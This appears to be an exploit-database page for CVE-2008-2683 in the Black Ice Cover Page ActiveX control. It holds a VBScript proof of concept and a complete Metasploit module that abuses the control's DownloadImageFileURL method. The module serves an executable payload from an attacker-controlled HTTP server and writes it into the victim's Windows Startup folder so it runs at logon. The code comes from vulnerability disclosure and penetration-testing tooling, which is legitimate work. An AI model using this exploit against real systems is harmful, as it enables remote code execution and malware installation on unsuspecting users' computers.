1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 |
<html> Blackice Cover Page SDK insecure method DownloadImageFileURL() exploit <!-- RegKey Safe for Script: True RegkeySafe for Init: True KillBitSet: False vendor: http://www.blackice.com/ software link: http://www.blackice.com/DownloadForms/downloadformimp.asp?product=Cover+Page+Generator --> <object classid='clsid:79956462-F148-497F-B247-DF35A095F80B' id='target' ></object> <script language='vbscript'> arg1="http://www.google.com/robots.txt" arg2="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\robots.txt" target.DownloadImageFileURL arg1 ,arg2 </script> </html> # MSF Module ## # $Id: blackice_coverpage_download.rb 12540 2011-06-20 20:43:19Z mr_me $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :os_name=> OperatingSystems::WINDOWS, :javascript => true, :rank => NormalRanking, :vuln_test=> nil, }) def initialize(info = {}) super(update_info(info, 'Name' => 'Black Ice Cover Page ActiveX Control Arbitrary File Download', 'Description'=> %q{ This module allows remote attackers to place arbitrary files on a users file system by abusing the "DownloadImageFileURL" method in the Black Ice BIImgFrm.ocx ActiveX Control (BIImgFrm.ocx 12.0.0.0). This issue is also reported in BIDIB.ocx (10.9.3.0) within the Barcode SDK. }, 'License'=> MSF_LICENSE, 'Author' => [ 'shinnai', # original discovery 'mr_me' # msf ], 'Version'=> '$Revision: 12540 $', 'References' => [ [ 'CVE', '2008-2683'], [ 'OSVDB', '46007'], [ 'BID', '29577'], [ 'URL', 'http://www.exploit-db.com/exploits/5750/' ], ], 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f', }, 'Payload'=> { 'Space' => 2048, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets'=> [ [ 'Automatic', { } ], ], 'DefaultTarget'=> 0, 'DisclosureDate' => 'Jun 20 2011')) register_options( [ OptString.new('PATH', [ true, 'The path to place the executable.', 'C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\']), ], self.class) end def autofilter false end def check_dependencies use_zlib end def on_request_uri(cli, request) payload_url ="http://" payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload" if (request.uri.match(/payload/)) return if ((p = regenerate_payload(cli)) == nil) data = generate_payload_exe({ :code => p.encoded }) print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, data, { 'Content-Type' => 'application/octet-stream' }) return end # random junk vname= rand_text_alpha(rand(100) + 1) exe= rand_text_alpha(rand(20) + 1) clsid= "79956462-F148-497F-B247-DF35A095F80B" blackice = rand_text_alpha(rand(100) + 1) method = "DownloadImageFileURL" arg1 = rand_text_alpha(rand(100) + 1) arg2 = rand_text_alpha(rand(100) + 1) content = <<-EOS <html> <object classid='clsid:#{clsid}' id='#{blackice}' ></object> <script language='vbscript'> #{arg1} = "#{payload_url}" #{arg2} = "#{datastore['PATH']}#{exe}.exe" #{blackice}.#{method} #{arg1}, #{arg2} </script> </html> EOS print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response_html(cli, content) handler(cli) end end |